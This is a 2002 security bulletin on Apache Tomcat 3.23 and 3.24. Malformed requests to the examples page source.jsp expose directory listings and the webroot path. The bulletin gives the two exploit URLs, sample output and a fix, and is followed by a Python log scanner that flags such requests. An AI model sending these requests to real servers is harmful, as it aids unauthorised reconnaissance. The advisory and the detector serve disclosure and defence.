Procheckup Ltd
www.procheckup.com

Procheckup Security Bulletin PR02-05

Description: Tomcat source.jsp directory listing and webroot location display
Date: 8/1/2002
Application: Apache Tomcat Java server versions 3.23 and 3.24
Platform: Linux/Unix
Severity: Remote attackers can obtain listings of web directories and sometimes the location of the webroot
Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
Reference: www.procheckup.com/security_info/vuln.html

Description:

Tomcat is the free open-source Java server, http://jakarta.apache.org/tomcat/. Normally source.jsp is used to look at the source code of programs within the examples directories. A typical request is:

http://webserver:80/examples/jsp/source.jsp?/jsp/num/numguess.jsp

We have found that when source.jsp is given malformed input, a directory listing is displayed and the location of the webroot is sometimes disclosed. The vulnerabilities may only work on port 8080 rather than port 80, depending on how the webserver has been configured with Tomcat.

Exploits:

A) Requesting the following URL:

http://webserver:80/examples/jsp/source.jsp??

gives the directory listing and webroot on 3.23; 3.24 just gives a directory listing.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WEBROOT"/webapps/examples</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="images">images</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="jsp">jsp</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="META-INF">META-INF</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="servlets">servlets</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="WEB-INF">WEB-INF</a><br>

B) Requesting the following URL:

http://webserver:80/examples/jsp/source.jsp?/jsp/

gives the directory listing and webroot on 3.23; 3.24 just gives a directory listing of a subdirectory.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>/"WEBROOT"/webapps/examples/jsp</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="cal">cal</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="checkbox">checkbox</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="colors">colors</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="dates">dates</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="error">error</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="forward">forward</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="include">include</a><br>
<img align=middle src="doc:/lib/images/ftp/file.gif" width=32 height=32> <a href="index.html">index.html</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="jsptoserv">jsptoserv</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="num">num</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="plugin">plugin</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="security">security</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="sessions">sessions</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="simpletag">simpletag</a><br>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="snp">snp</a><br>
<img align=middle src="doc:/lib/images/ftp/file.gif" width=32 height=32> <a href="source.jsp">source.jsp</a><br>

Solution:

Delete the examples directory if it is not needed.

Legal:

Copyright 2002 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
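The two request shapes shown above (an empty argument and a directory argument to source.jsp) are easy to spot in web server access logs. The following Python script is an added example, not part of the Procheckup bulletin and not Tomcat code: it parses constructed common-log-format lines and flags every request to source.jsp whose argument does not name a .jsp file, which generalises the two cases in the bulletin to the only legitimate use of the page (viewing the source of an example JSP). The log lines, hosts and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines in common log format (not taken from the bulletin).
# Lines 2 and 3 mirror the two request shapes the bulletin describes.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jan/2002:10:15:32 +0000] "GET /examples/jsp/source.jsp?/jsp/num/numguess.jsp HTTP/1.0" 200 1412
10.0.0.9 - - [08/Jan/2002:10:16:01 +0000] "GET /examples/jsp/source.jsp?? HTTP/1.0" 200 2210
10.0.0.9 - - [08/Jan/2002:10:16:07 +0000] "GET /examples/jsp/source.jsp?/jsp/ HTTP/1.0" 200 3902
10.0.0.7 - - [08/Jan/2002:10:17:44 +0000] "GET /index.html HTTP/1.0" 200 512
"""

# Common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def source_jsp_argument(target):
    """Return (is_source_jsp, argument) for a request target.

    urlsplit splits at the first '?', so 'source.jsp??' yields the query '?'
    and 'source.jsp?/jsp/' yields '/jsp/'.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/source.jsp"):
        return False, None
    return True, unquote(parts.query)


def is_suspicious_argument(arg):
    """True when the argument cannot be a request to view an example .jsp file.

    An empty argument ('source.jsp??') or a directory argument ('source.jsp?/jsp/')
    is what produced the listings in the bulletin; any other non-.jsp argument is
    treated the same way because viewing a .jsp source is the page's only purpose.
    """
    arg = arg.strip().lstrip("?")
    if arg == "":
        return True
    if arg.endswith("/"):
        return True
    return not arg.lower().endswith(".jsp")


def scan_access_log(text):
    """Return one finding dict per suspicious source.jsp request in the log text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production scanner would count these
        is_src, arg = source_jsp_argument(m.group("target"))
        if not is_src or not is_suspicious_argument(arg):
            continue
        findings.append({
            "line": lineno,
            "host": m.group("host"),
            "argument": arg,
            "status": int(m.group("status")),
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['host']} requested source.jsp with argument {f['argument']!r} (HTTP {f['status']})")
```

A 200 status on a flagged request means the examples webapp is still deployed and answered the listing; the fix the bulletin gives, removing the examples directory, turns these into 404s. The scan is only a detection aid: a server that no longer ships the examples webapp has nothing for these requests to hit.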